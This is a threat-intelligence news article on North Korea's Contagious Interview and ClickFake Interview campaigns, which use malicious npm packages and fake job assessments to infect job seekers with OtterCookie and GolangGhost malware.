N. Korea’s Contagious Interview Campaign Targets Job Seekers with 197 Malicious npm Packages
North Korea’s Contagious Interview malware campaign continues to escalate its pressure on the JavaScript-development ecosystem. Threat actors affiliated with DPRK hacking units are massively uploading malicious packages to the npm repository, disguising spyware distribution as legitimate tools and “test assignments” for supposed job interviews.
According to the security firm Socket, attackers have recently added another 197 malicious packages to npm, collectively downloaded more than 31,000 times. These components deliver a new variant of the OtterCookie malware, blending capabilities from earlier OtterCookie builds with features from the BeaverTail family. Among the identified loaders are bcryptjs-node, cross-sessions, json-oauth, node-tailwind, react-adparser, session-keeper, tailwind-magic, tailwindcss-forms, and webpack-loadcss.
Once executed, such a package checks whether it is running inside a sandbox or virtual machine, gathers system information, and establishes a command-and-control channel. Through this connection, operators gain remote access to the device, enabling them to intercept clipboard contents, log keystrokes, capture screenshots, and extract browser credentials, documents, cryptocurrency-wallet data, and seed phrases.
Cisco Talos researchers have previously observed the blurring of boundaries between OtterCookie and BeaverTail, citing an incident in Sri Lanka where a system was infected via a fake Node.js application tied to a fraudulent job interview. The current wave of npm packages is configured to connect to a hardcoded Vercel address—“tetrismic.vercel[.]app”—from which a cross-platform OtterCookie binary is downloaded, hosted in a GitHub repository.
The delivery account, stardev0914, is no longer active, yet the campaign’s infrastructure continues to shift and evolve. Analysts, including Kirill Boychenko, note that the threat actors swiftly adapt their tooling to modern JavaScript projects and cryptocurrency-development environments.
In parallel, a related operation known as ClickFake Interview is expanding. This campaign involves fabricated evaluation websites that present “assessment tasks,” instructing applicants to “fix” a webcam or microphone using ClickFix-style guides. In reality, victims are coerced into downloading the GolangGhost malware (also known as FlexibleFerret or WeaselStore), written in Go.
The program connects to a hardcoded command-and-control server, continuously processes operator commands, gathers system information, executes instructions, manipulates files, and extracts data from Google Chrome. Persistence on macOS is achieved through a LaunchAgent that executes a shell script whenever the user logs in.
The infection chain also employs a decoy application: it displays a fake Chrome-branded prompt requesting camera access, followed by a “Chrome-like” password dialog. The entered credentials are instantly exfiltrated to the attacker’s Dropbox account without arousing user suspicion.
Researchers at Validin emphasize that, unlike other DPRK operations focused on infiltrating legitimate companies under false identities, Contagious Interview and ClickFake Interview target job seekers themselves—compromising them through staged recruitment processes, fabricated assignments, and counterfeit hiring platforms.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
